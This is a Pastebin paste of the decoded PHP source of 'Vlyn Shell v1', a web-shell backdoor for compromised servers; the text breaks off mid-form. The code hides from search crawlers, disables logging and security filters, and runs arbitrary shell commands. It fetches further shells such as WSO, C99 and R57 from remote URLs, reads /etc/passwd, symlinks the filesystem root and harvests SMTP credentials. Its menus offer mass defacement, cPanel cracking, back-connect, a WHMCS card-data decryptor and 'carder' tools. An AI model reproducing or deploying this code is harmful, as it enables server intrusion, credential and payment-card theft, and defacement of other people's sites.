Psycho404

Vlyn Shell v1 Decode

Apr 9th, 2018
140
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 231.81 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12. $auth_pass = "494b0d53cd0b5dd042884961d1852670";
  13. $color = "#00ff00";
  14. $default_action = 'FilesMan';
  15. $default_use_ajax = true;
  16. $default_charset = 'UTF-8';
  17. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  18. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  19. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  20. header('HTTP/1.0 404 Not Found');
  21. exit;
  22. }
  23. }
  24.  
  25. function login_shell() {
  26. ?>
  27. <html>
  28. <head>
  29. <title>Vlyn Shell v1</title>
  30. <style type="text/css">
  31. html {
  32. background: #000000;
  33. color: green;
  34. }
  35. header {
  36. color: green;
  37. margin: 10px auto;
  38. }
  39. input[type=password] {
  40. width: 250px;
  41. height: 25px;
  42. color: blue;
  43. background: #FF01F2;
  44. border: 2px dotted blue;
  45. padding: 5px;
  46. margin-left: 20px;
  47. text-align: center;
  48. }
  49. </style>
  50. </head>
  51. <header>
  52. <center><img src="https://i.imgur.com/gtjfwLT.png" width="30%" height="40%"></img></center>
  53. </header>
  54. <br>
  55. <form method="post">
  56. <center><input type="password" name="pass"><center>
  57. </form>
  58. <?php
  59. exit;
  60. }
  61. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  62. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  63. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  64. else
  65. login_shell();
  66. ?>
  67. <html>
  68. <head>
  69. <title>Vlyn Shell v1</title>
  70. <link href='https://www.google.co.id/images/branding/product/ico/googleg_lodp.ico' rel='icon' type='image/x-icon'/>
  71. <meta name='author' content='Vlyn Was Here !!!'>
  72. <meta charset="UTF-8">
  73. <style type='text/css'>
  74. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  75. html {
  76. background: #000000;
  77. color: #FF01F2;
  78. font-family: 'Ubuntu';
  79. font-size: 13px;
  80. width: 100%;
  81. }
  82. li {
  83. display: inline;
  84. margin: 0px;
  85. padding: 0px;
  86. }
  87. table, th, td {
  88. border-collapse:collapse;
  89. font-family: 'Ubuntu';
  90. background: transparent;
  91. font-size: 13px;
  92. }
  93. th {
  94. padding: 10px;
  95. }
  96. a {
  97. color: #FF01F2;
  98. text-decoration: none;
  99. }
  100. a:hover {
  101. color: blue;
  102. text-decoration: underline;
  103. }
  104. b {
  105. color: gold;
  106. }
  107. tr:hover {
  108. background: green;
  109. color: #ffffff;
  110. }
  111. input[type=text], input[type=password],input[type=submit] {
  112. background: transparent;
  113. color: #ffffff;
  114. border: 1px solid #ffffff;
  115. margin: 5px auto;
  116. padding-left: 5px;
  117. font-family: 'Abel';
  118. font-size: 13px;
  119. }
  120. textarea {
  121. border: 1px solid #ffffff;
  122. width: 100%;
  123. height: 400px;
  124. padding-left: 5px;
  125. margin: 10px auto;
  126. resize: none;
  127. background: transparent;
  128. color: #ffffff;
  129. font-family: 'Abel';
  130. font-size: 13px;
  131. }
  132. select {
  133. background: blue;
  134. color: #FF01F2;
  135. border: 1px solid #ffffff;
  136. margin: 5px auto;
  137. padding-left: 5px;
  138. font-family: 'Abel';
  139. font-size: 13px;
  140. }
  141. .but {
  142. background: transparent;
  143. color: #ffffff;
  144. border: 1px solid #ffffff;
  145. margin: 5px auto;
  146. padding-left: 5px;
  147. font-family: 'Abel';
  148. font-size: 13px;
  149. }
  150. .content{
  151. width:100%; text-decoration:none; color:#FF01F2;
  152. }
  153. .content a:link {
  154. text-decoration: none;
  155. }
  156. .content a:visited {
  157. }
  158. .content a:hover {
  159. background: #FF01F2; color: black;
  160. }
  161. .content td{
  162. padding:0 8px; line-height:24px;
  163. }
  164. .content th{
  165. background: #191919; padding:3px 8px; font-weight:normal;
  166. }
  167. .content tr:hover{
  168. cursor:pointer;
  169. background-color: #111111;
  170. }
  171. #nav{position:fixed;z-index:999;top:0;width:100%;left:76%;
  172. }
  173. a.nav-fokus {display:block; width:auto; height:auto; background:transparent; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff; padding:5px 8px; text-align:center; text-decoration:none; color:#b3eeff; line-height:20px; overflow:hidden; float:left;
  174. }
  175. a.nav-fokus:hover {color:#FFFFFF; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff; border-bottom:1px solid #fff;
  176. }
  177. </style>
  178. </head>
  179. <?php
  180. if (file_exists("php.ini")){
  181. }else{
  182. $img = fopen('php.ini', 'w');
  183. $sec = "safe_mode = OFF
  184. disable_funtions = NONE";
  185. fwrite($img ,$sec);
  186. fclose($img);}
  187. function w($dir,$perm) {
  188. if(!is_writable($dir)) {
  189. return "<font color=red>".$perm."</font>";
  190. } else {
  191. return "<font color=blue>".$perm."</font>";
  192. }
  193. }
  194. function UrlLoop($url,$type){
  195.  
  196. $urlArray = array();
  197.  
  198. $ch = curl_init();
  199. curl_setopt($ch, CURLOPT_URL, $url);
  200. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  201. $result = curl_exec($ch);
  202.  
  203. $regex='|<a.*?href="(.*?)"|';
  204. preg_match_all($regex,$result,$parts);
  205. $links=$parts[1];
  206. foreach($links as $link){
  207. array_push($urlArray, $link);
  208. }
  209. curl_close($ch);
  210.  
  211. foreach($urlArray as $value){
  212. $lol="$url$value";
  213. if(preg_match("#$type#is", $lol)) {
  214. echo "$lol\r\n";
  215. }
  216. }
  217. }
  218. function exe($cmd) {
  219. if(function_exists('system')) {
  220. @ob_start();
  221. @system($cmd);
  222. $buff = @ob_get_contents();
  223. @ob_end_clean();
  224. return $buff;
  225. } elseif(function_exists('exec')) {
  226. @exec($cmd,$results);
  227. $buff = "";
  228. foreach($results as $result) {
  229. $buff .= $result;
  230. } return $buff;
  231. } elseif(function_exists('passthru')) {
  232. @ob_start();
  233. @passthru($cmd);
  234. $buff = @ob_get_contents();
  235. @ob_end_clean();
  236. return $buff;
  237. } elseif(function_exists('shell_exec')) {
  238. $buff = @shell_exec($cmd);
  239. return $buff;
  240. }
  241. }
  242. function perms($file){
  243. $perms = fileperms($file);
  244. if (($perms & 0xC000) == 0xC000) {
  245. $info = 's';
  246. } elseif (($perms & 0xA000) == 0xA000) {
  247. $info = 'l';
  248. } elseif (($perms & 0x8000) == 0x8000) {
  249. $info = '-';
  250. } elseif (($perms & 0x6000) == 0x6000) {
  251. $info = 'b';
  252. } elseif (($perms & 0x4000) == 0x4000) {
  253. $info = 'd';
  254. } elseif (($perms & 0x2000) == 0x2000) {
  255. $info = 'c';
  256. } elseif (($perms & 0x1000) == 0x1000) {
  257. $info = 'p';
  258. } else {
  259. $info = 'u';
  260. }
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. $info .= (($perms & 0x0020) ? 'r' : '-');
  267. $info .= (($perms & 0x0010) ? 'w' : '-');
  268. $info .= (($perms & 0x0008) ?
  269. (($perms & 0x0400) ? 's' : 'x' ) :
  270. (($perms & 0x0400) ? 'S' : '-'));
  271. $info .= (($perms & 0x0004) ? 'r' : '-');
  272. $info .= (($perms & 0x0002) ? 'w' : '-');
  273. $info .= (($perms & 0x0001) ?
  274. (($perms & 0x0200) ? 't' : 'x' ) :
  275. (($perms & 0x0200) ? 'T' : '-'));
  276. return $info;
  277. }
  278. function hdd($s) {
  279. if($s >= 1073741824)
  280. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  281. elseif($s >= 1048576)
  282. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  283. elseif($s >= 1024)
  284. return sprintf('%1.2f',$s / 1024 ) .' KB';
  285. else
  286. return $s .' B';
  287. }
  288. function ambilKata($param, $kata1, $kata2){
  289. if(strpos($param, $kata1) === FALSE) return FALSE;
  290. if(strpos($param, $kata2) === FALSE) return FALSE;
  291. $start = strpos($param, $kata1) + strlen($kata1);
  292. $end = strpos($param, $kata2, $start);
  293. $return = substr($param, $start, $end - $start);
  294. return $return;
  295. }
  296. if(get_magic_quotes_gpc()) {
  297. function idx_ss($array) {
  298. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  299. }
  300. $_POST = idx_ss($_POST);
  301. }
  302. function CreateTools($names,$lokasi){
  303. if ( $_GET['create'] == $names ){
  304. $a= "".$_SERVER['SERVER_NAME']."";
  305. $b= dirname($_SERVER['PHP_SELF']);
  306. $c = "/Vlyn_tools/".$names.".php";
  307. if (file_exists('Vlyn_tools/'.$names.'.php')){
  308. echo '<script type="text/javascript">alert("Done");window.location.href = "Vlyn_tools/'.$names.'.php";</script> ';
  309. }
  310. else {mkdir("Vlyn_tools", 0777);
  311. file_put_contents('Vlyn_tools/'.$names.'.php', file_get_contents($lokasi));
  312. echo ' <script type="text/javascript">alert("Done");window.location.href = "Vlyn_tools/'.$names.'.php";</script> ';}}}
  313.  
  314. CreateTools("WSO 2.5","http://pastebin.com/raw/N0eh3Q7Y");
  315. CreateTools("WSO 2.1","http://pastebin.com/raw/cuWAmsUE");
  316. CreateTools("WSO Magic Shell","http://pastebin.com/raw/xcuHtZy2");
  317. CreateTools("Adminer"."https://jafaria.co.in/adminer.txt");
  318. CreateTools("wk"."https://pastebin.com/raw/DrVkk4gZ");
  319. CreateTools("b374k 2.4","http://pastebin.com/raw/cR71LiMp");
  320. CreateTools("1n73ction 3.3","http://pastebin.com/raw/STG77KwF");
  321. CreateTools("Sadrazam","http://pastebin.com/raw/xjKrnnBD");
  322. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  323. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  324. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  325. CreateTools("EncodeDecode","http://pastebin.com/raw/wqB3G5eZ");
  326. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  327. CreateTools("R57","http://pastebin.com/raw/G2VEDunW");
  328. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  329. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  330. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  331. CreateTools("C99","http://pastebin.com/raw/Ms0ptnpH");
  332. if(isset($_GET['dir'])) {
  333. $dir = $_GET['dir'];
  334. chdir($_GET['dir']);
  335. } else {
  336. $dir = getcwd();
  337. }
  338. $dir = str_replace("\\","/",$dir);
  339. $scdir = explode("/", $dir);
  340. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  341. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  342. $ds = @ini_get("disable_functions");
  343. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  344. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  345. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  346. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  347. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  348. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  349. if(!function_exists('posix_getegid')) {
  350. $user = @get_current_user();
  351. $uid = @getmyuid();
  352. $gid = @getmygid();
  353. $group = "?";
  354. } else {
  355. $uid = @posix_getpwuid(posix_geteuid());
  356. $gid = @posix_getgrgid(posix_getegid());
  357. $user = $uid['name'];
  358. $uid = $uid['uid'];
  359. $group = $gid['name'];
  360. $gid = $gid['gid'];
  361. }
  362. $d0mains = @file("/etc/named.conf");
  363. $users=@file('/etc/passwd');
  364. if($d0mains)
  365. {
  366. $count;
  367. foreach($d0mains as $d0main)
  368. {
  369. if(@ereg("zone",$d0main))
  370. {
  371. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  372. flush();
  373. if(strlen(trim($domains[1][0])) > 2)
  374. {
  375. flush();
  376. $count++;
  377. }
  378. }
  379. }
  380. }
  381.  
  382. $sport=$_SERVER['SERVER_PORT'];
  383. echo "<table style='width:100%'>";
  384. echo "<tr><td>System: <font color=blue>".php_uname()."</font></td></tr>";
  385. echo "<tr><td>User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")</td></tr>";
  386. echo "<tr><td>Server IP: <font color=blue>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  387. echo "<tr><td>HDD: <font color=blue>".hdd(disk_free_space("/"))."</font> / <font color=blue>".hdd(disk_total_space("/"))."</font></td></tr>";
  388. echo "<tr><td>Websites :<font color=blue> $count </font> Domains</td></tr>";
  389. echo "<tr><td>Port :<font color=blue> $sport</font> </td></tr>";
  390. echo "<tr><td>Safe Mode: $sm</td></tr>";
  391. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  392. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  393. echo "<tr><td>Current DIR: ";
  394. foreach($scdir as $c_dir => $cdir) {
  395. echo "<a href='?dir=";
  396. for($i = 0; $i <= $c_dir; $i++) {
  397. echo $scdir[$i];
  398. if($i != $c_dir) {
  399. echo "/";
  400. }
  401. }
  402. echo "'>$cdir</a>/";
  403. }
  404. echo "</td></tr></table><hr color=blue>";
  405. echo "<center>";
  406. echo "<from><select onchange='if (this.value) window.open(this.value);'>
  407. <option selected='selected' value=''> Tools Shell </option>
  408. <option value='?dir=$dir&do=adminer'>Adminer</option>
  409. <option value='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</option>
  410. <option value='?dir=$dir&do=auto_edit_user'>Auto Edit User</option>
  411. <option value='?dir=$dir&&backconnect=tool'>Back Connect</option>
  412. <option value='?dir=$dir&do=passwbypass'>Bypass etc/passwd</option>
  413. <option value='?dir=$dir&do=vhost'>Bypass vHost</option>
  414. <option value='?dir=$dir&do=cgi'>CGI Telnet</option>
  415. <option value='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</option>
  416. <option value='?dir=$dir&do=cmd'>Command</option>
  417. <option value='?dir=$dir&do=config'>Config</option>
  418. <option value='?dir=$dir&do=cpanel'>Cpanel Crack</option>
  419. <option value='?dir=$dir&do=defacerid'>Defacer.ID</option>
  420. <option value='?dir=$dir&do=bypass'>Disable Functions</option>
  421. <option value='?dir=$dir&do=decode'>Encode/Decode</option>
  422. <option value='?dir=$dir&do=fake_root'>Fake Root</option>
  423. <option value='?dir=$dir&do=hash'>Hash Generator</option>
  424. <option value='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</option>
  425. <option value='?dir=$dir&do=jumping'>Jumping</option>
  426. <option value='?dir=$dir&do=krdp_shell'>K-RDP Shell</option>
  427. <option value='?dir=$dir&do=lcf'>LiteSpeed Config</option>
  428. <option value='?dir=$dir&do=loghunter'>Log Hunter</option>
  429. <option value='?dir=$dir&do=mass_deface'>Mass Deface</option>
  430. <option value='?dir=$dir&do=ports'>Port Scanner</option>
  431. <option value='?dir=$dir&do=smtp'>SMTP Grabber</option>
  432. <option value='?dir=$dir&do=shellchk'>Shell Checker</option>
  433. <option value='?dir=$dir&do=shelscan'>Shell Finder</option>
  434. <option value='?dir=$dir&do=symconfig'>Symconfig</option>
  435. <option value='?dir=$dir&do=symlink'>Symlink</option>
  436. <option value='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</option>
  437. <option value='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</option>
  438. <option value='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</option>
  439. <option value='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</option>
  440. <option value='?dir=$dir&do=zip'>Zip Menu</option>
  441. <option value='?dir=$dir&do=zoneh'>Zone-H</option>
  442. </select>
  443. <select onchange='if (this.value) window.open(this.value);'>
  444. <option selected='selected' value=''> Tools Carder </option>
  445. <option value='$ling=extractor'>DB Email Extractor</option>
  446. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  447. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  448. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  449. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  450. <option value='$ling=mailer'>Mailer</option>
  451. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  452. </select>
  453. <noscript><input type='submit' value='Submit'></noscript>
  454. </form>";
  455. if($_POST['upload']) {
  456. if($_POST['tipe_upload'] == 'biasa') {
  457. if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  458. $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  459. } else {
  460. $act = "<font color=red>Failed to upload file</font>";
  461. }
  462. } else {
  463. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  464. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  465. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  466. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  467. $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  468. } else {
  469. $act = "<font color=red>Failed to upload file</font>";
  470. }
  471. } else {
  472. $act = "<font color=red>Failed to upload file</font>";
  473. }
  474. }
  475. }
  476. echo "<center>
  477. <form method='post' enctype='multipart/form-data'>
  478. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  479. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  480. <input type='file' name='ix_file'>
  481. <input type='submit' value='upload' name='upload'>
  482. </form></center>";
  483. echo "</center>";
  484. echo "<hr color=blue>";
  485. if($_GET['do'] == 'upload') {
  486. echo "<center>";
  487. if($_POST['upload']) {
  488. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  489. $act = "<font color=lime>Upload Succes!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  490. } else {
  491. $act = "<font color=red>Upload Failed!</font>";
  492. }
  493. }
  494. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  495. echo $act;
  496. echo "</center>";
  497. }
  498. elseif($_GET['do'] == 'ports') {
  499. echo '<center><table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  500. echo '<div class="content">';
  501. echo '<form action="" method="post">';
  502.  
  503. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  504. $start = strip_tags($_POST['start']);
  505. $end = strip_tags($_POST['end']);
  506. $host = strip_tags($_POST['host']);
  507. for($i = $start; $i<=$end; $i++){
  508. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  509. if($fp){
  510. echo 'Port '.$i.' is <font color=green>open</font><br>';
  511. }
  512. flush();
  513. }
  514. } else {
  515. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  516. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  517. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  518. Host: <input type="text" name="host" value="localhost"/><br /><br />
  519. Port start: <input type="text" name="start" value="0"/><br /><br />
  520. Port end:<input type="text" name="end" value="5000"/><br /><br />
  521. <input type="submit" value="Scan Ports" />
  522. </form></center><br /><br />';
  523. echo '</div></table></td></center>';
  524.  
  525. }
  526. }
  527. elseif($_GET['do'] == 'vhost') {
  528. echo "<form method='POST' action=''>";
  529. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  530. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  531. if (isset($_POST['Colii'])){ system('ln -s / Rintoar.txt');
  532. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  533. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  534. $rt="<br><a href=Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  535. Bypassed Successfully</b></font></a>";
  536. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
  537. }
  538. elseif($_GET['do'] == 'decode') {
  539. {$text = $_POST['code'];
  540. ?>
  541. <center><br><br><b>Decode & Encode Script</b><br><br>
  542. <form method="post"><br><br><br>
  543. <textarea class='inputz' cols=20 rows=5 name="code"></textarea><br><br>
  544. <select class='inputz' size="1" name="ope">
  545. <option value="base64">Base64</option>
  546. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  547. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  548. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  549. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  550. </form>
  551. <?php
  552. $submit = $_POST['submit'];
  553. if (isset($submit)){
  554. $op = $_POST["ope"];
  555. switch ($op) {case 'base64': $codi=base64_encode($text);
  556. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  557. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  558. break;default:break;}}
  559.  
  560. $submit = $_POST['submits'];
  561. if (isset($submit)){
  562. $op = $_POST["ope"];
  563. switch ($op) {case 'base64': $codi=base64_decode($text);
  564. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  565. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  566. break;default:break;}}
  567.  
  568. echo '<textarea cols=10 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
  569.  
  570. }
  571. }
  572. elseif($_GET['do'] == 'smtp') {
  573. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  574. function scj($dir) {
  575. $dira = scandir($dir);
  576. foreach($dira as $dirb) {
  577. if(!is_file("$dir/$dirb")) continue;
  578. $ambil = file_get_contents("$dir/$dirb");
  579. $ambil = str_replace("$", "", $ambil);
  580. if(preg_match("/JConfig|joomla/", $ambil)) {
  581. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  582. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  583. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  584. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  585. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  586. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  587. echo "SMTP Host: <font color=blue>$smtp_host</font><br>";
  588. echo "SMTP port: <font color=blue>$smtp_port</font><br>";
  589. echo "SMTP user: <font color=blue>$smtp_user</font><br>";
  590. echo "SMTP pass: <font color=blue>$smtp_pass</font><br>";
  591. echo "SMTP auth: <font color=blue>$smtp_auth</font><br>";
  592. echo "SMTP secure: <font color=blue>$smtp_secure</font><br><br>";
  593. }
  594. }
  595. }
  596. $smpt_hunter = scj($dir);
  597. echo $smpt_hunter;
  598. }
  599. elseif($_GET['do'] == 'hash') {
  600. $submit = $_POST['enter'];
  601.  
  602. if (isset($submit)) {
  603.  
  604. $pass = $_POST['password']; // password
  605.  
  606. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  607.  
  608. $hash = md5($pass); // md5 hash #1
  609.  
  610. $md4 = hash("md4", $pass);
  611. $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
  612.  
  613. $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
  614.  
  615. $hash1 = sha1($pass); // sha1 hash #4
  616. $sha256 = hash("sha256", $text);
  617.  
  618. $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
  619.  
  620. $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
  621.  
  622.  
  623. }
  624. echo '<form action="" method="post"><b> ';
  625.  
  626. echo '<center><h2><b>-=[ Password Hash]=-</b></h2></center></tr>';
  627.  
  628. echo ' <b>masukan kata yang ingin di encrypt:</b> ';
  629.  
  630. echo ' <input class="inputz" type="text" name="password" size="40" />';
  631.  
  632. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  633.  
  634. echo ' <br>';
  635. echo ' Hasil Hash</th></center></tr>';
  636.  
  637. echo ' Original Password <input class=inputz type=text size=50 value=' . $pass . '> <br><br>';
  638.  
  639. echo ' MD5 <input class=inputz type=text size=50 value=' . $hash . '> <br><br>';
  640.  
  641. echo ' MD4 <input class=inputz type=text size=50 value=' . $md4 . '> <br><br>';
  642.  
  643. echo ' MD5 with Salt <input class=inputz type=text size=50 value=' . $hash_md5 . '> <br><br>';
  644.  
  645. echo ' MD5 with Salt & Sha1 <input class=inputz type=text size=50 value=' . $hash_md5_double . '> <br><br>';
  646.  
  647. echo ' Sha1 <input class=inputz type=text size=50 value=' . $hash1 . '> <br><br>';
  648.  
  649. echo ' Sha256 <input class=inputz type=text size=50 value=' . $sha256 . '> <br><br>';
  650.  
  651. echo ' Sha1 with Salt <input class=inputz type=text size=50 value=' . $hash1_sha1 . '> <br><br>';
  652.  
  653. echo ' Sha1 with Salt & MD5 <input class=inputz type=text size=50 value=' . $hash1_sha1_double . '> <br><br>';
  654.  
  655. }
  656. elseif($_GET['do'] == 'bypass'){
  657. echo "<center>";
  658. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  659. if(isset($_POST['ini']))
  660. {
  661. $file = fopen("php.ini","w");
  662. echo fwrite($file,"disable_functions=none
  663. safe_mode = Off
  664. ");
  665. fclose($file);
  666. echo "<a href='php.ini'>click here!</a>";
  667. } if(isset($_POST['htce']))
  668. {
  669. $file = fopen(".htaccess","w");
  670. echo fwrite($file,"<IfModule mod_security.c>
  671. SecFilterEngine Off
  672. SecFilterScanPOST Off
  673. </IfModule>
  674. ");
  675. fclose($file);
  676. echo "htaccess successfully created!";
  677. }
  678. echo"</center>";
  679. }
  680. elseif(isset($_GET['do']) && ($_GET['do'] == 'whmcsdecod'))
  681. {
  682. ?>
  683. <form action="?y=<?php echo $pwd; ?>&amp;do=whmcs" method="post">
  684.  
  685. <?php
  686.  
  687. function decrypt ($string,$cc_encryption_hash)
  688. {
  689. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  690. $hash_key = _hash ($key);
  691. $hash_length = strlen ($hash_key);
  692. $string = base64_decode ($string);
  693. $tmp_iv = substr ($string, 0, $hash_length);
  694. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  695. $iv = $out = '';
  696. $c = 0;
  697. while ($c < $hash_length)
  698. {
  699. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  700. ++$c;
  701. }
  702. $key = $iv;
  703. $c = 0;
  704. while ($c < strlen ($string))
  705. {
  706. if (($c != 0 AND $c % $hash_length == 0))
  707. {
  708. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  709. }
  710. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  711. ++$c;
  712. }
  713. return $out;
  714. }
  715.  
  716. function _hash ($string)
  717. {
  718. if (function_exists ('sha1'))
  719. {
  720. $hash = sha1 ($string);
  721. }
  722. else
  723. {
  724. $hash = md5 ($string);
  725. }
  726. $out = '';
  727. $c = 0;
  728. while ($c < strlen ($hash))
  729. {
  730. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  731. $c += 2;
  732. }
  733. return $out;
  734. }
  735.  
  736. echo "
  737. <br><center><font size='5' color='#FFFFFF'><b>-=[ WHMCS Decoder ]=-</b></font></center>
  738. <center>
  739. <br>
  740.  
  741. <FORM action='' method='post'>
  742. <input type='hidden' name='form_action' value='2'>
  743. <br>
  744. <table class=tabnet style=width:320px;padding:0 1px;>
  745. <tr><th colspan=2>WHMCS Decoder</th></tr>
  746. <tr><td>db_host </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  747. <tr><td>db_username </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  748. <tr><td>db_password</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
